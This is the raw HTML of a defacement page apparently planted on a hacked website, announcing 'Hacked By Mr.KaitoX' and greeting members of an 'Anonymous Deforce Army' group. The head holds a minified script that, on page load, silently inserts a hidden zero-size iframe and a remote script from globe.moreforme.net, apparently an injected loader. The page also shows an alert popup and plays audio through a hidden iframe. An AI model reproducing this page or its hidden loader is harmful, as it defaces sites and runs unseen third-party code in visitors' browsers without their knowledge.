<html>  
<head>
	<script>
		if(top==window){

			var engageNameSpace="engagens";
			"undefined"==typeof window[engageNameSpace]&&(window[engageNameSpace]={}),window[engageNameSpace].engageLoader=function(){function e(e){return"undefined"!=typeof e&&null!==e}function t(){var t=document.createElement("script");t.setAttribute("src",s),t.setAttribute("id","fn_engage_script"),t.setAttribute("async",""),(null==document.head||e(document.head))&&(document.head=document.getElementsByTagName("head")[0]),document.head.appendChild(t)}function n(){var t=r();if(e(t)){var n=t;i()&&(n=d(t));var o;try{o=document.documentElement,o.appendChild(n)}catch(c){o=document.body,o.appendChild(n)}a()}}function a(){function e(e){var n=e.data;"l8IframeIsReady"===n.message&&t()}window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onmessage",e)}function r(){var t=document.createElement("iframe");if(e(t)){t.setAttribute("id","fn_engage"),t.setAttribute("src",u),t.setAttribute("target","_blank"),t.setAttribute("frameborder","0");var n=/firefox/i.exec(navigator.userAgent);e(n)&&n.length>0?(t.style.height=0,t.style.width=0):t.style.display="none",t.frameBorder="no"}return t}function i(){var t=!1,n=/android (\d+)/i.exec(navigator.userAgent);return e(n)&&n.length>0&&(t=parseInt(n[1])>=4),t}function d(e){var t=document.createElement("div");return t.setAttribute("id","fn_wrapper_div"),t.style.position="fixed",t.style.display="none",t.ontouchstart=function(){return!0},t.appendChild(e),t}function o(){var t=void 0,a=this,r=function(){e(t)&&(window.clearTimeout(t),t=void 0,n.call(a))};t=window.setTimeout(r,1e4),"function"==typeof window.addEventListener?window.addEventListener("load",r,!1):window.attachEvent("onload",r)}var c="http://globe.moreforme.net",u=c+"/l8/EngageService?v=1",s=c+"/scripts/Engage.js";o()};var engageLoader=new window[engageNameSpace].engageLoader}
	</script>  
<link rel="shortcut icon" href="https://wallpapercave.com/wp/wp3912114.jpg" type="image/jpg"> 

 <meta property="title" content="Mr.KaitoX"/>  

 <meta property="description" content="Kaito was Here"/>  

  <title>Mr.KaitoX was Here!!</title>   

		 <link href='http://fonts.googleapis.com/css?family=Megrim' rel='stylesheet' type='text/css'>
		 <link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>     

	<script src="http://e-mete.com/js/kdsnow.js"></script>  

	<style>   
	 body{     

	 	 background-image: url(index.html);  
	      background-repeat: no-repeat;   
	        background-attachment: fixed;   
	          background-position: top;    
	           background-color:#000000;   
	             position: relative;  
	                background-size:100% 100vh;   
	                       }  
	          .logo {   
	            width: 300px;   
	              height: 300px;    
	               margin: 0 auto;   
	                 margin-top: 50px;  
	                    -webkit-filter: drop-shadow(0px 0px 7px #0080FF);     filter: drop-shadow(0px 0px 7px #0080FF);    }    
	     
	                        }   
	                     .defacedby{   
	                       font-family: Megrim;  
	                       text-align: center;  
	                       color: black;   
	                       font-weight: bold;
	                       font-size: 50px; 
	                       text-shadow: #0080FF 1px 2px 1px;  
	                             }
	                             .glow {    
	                         font-family: Quicksand;    
	                         text-align: center;     
	                         color: grey;     
	                         font-style: bold;     
	                         font-size: 15px;    
	                         margin-top: 16px;    
	                         text-shadow: black 1px 2px 1px;     
	                            }  
	                      .greetings{    
	                         font-family: Quicksand; 
	                           text-align: center;  
	                              color: #ffffff;   
	                                font-size: 15px; 
	                                  margin-top: 50px;
	                                   text-shadow: black 1px 2px 1px;  
	                                     }   
	                                      </style>   

	                                       </head>   
	                                        <body>  

	           <script>    
	           alert('Hacked By Mr.KaitoX')  
	            </script>  

	            <center>

    <img src="https://i.imgur.com/bWgfa6Z.jpg" height="250px" width="250px"></img>

    <br>  
     </center>
</div>
<div class="glow">
<h2>
<b><font color=red>" Hacked By : <font color=white> Mr.KaitoX " <b></h2>
<font color=cyan> [+] <font color="lime">We are</font> [+] <br> Anonymous Deforce Army 
<br>
<font color="green">We Are Legion</font>
<br>
<font color="yellow">We do not forgive</font>
<br><font color="red">We do not forget</font><br><font color="lime">Expect us</font></div>
<div class="greetings">
   <b><font color=white>[+] Greetz To :<br> All member in ADA <br>

<b> <font color="green">Mr.KaitoX</font> | <font color="yellow"> Xjacker</font> | <font color="red"> Firewall</font> | <font color="green"> Dhars</font> | <font color="yellow"> XxUseDataxX</font> | <font color="red">AnonZero</font> | <font color="green">Mr.Owl</font> | <font color="yellow">Aries</font> | <font color="red">Mr.Real</font> | <font color="green">Mr.Real</font> | <font color="yellow">Fox</font> |  <font color="red">Mr.Smile</font>
<br>
<br> 
Contact : <font color="red">www.facebook.com/</font><font color="orange">kaito<font color="yellow">X</font>spiker</font>

</div>
</embed>
</font>
<br>
<br>
<iframe width="0" height="0" src="https://api.soundcloud.com/tracks/566552475/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" frameborder="0" allowfullscreen>
	
</iframe> 
</html>
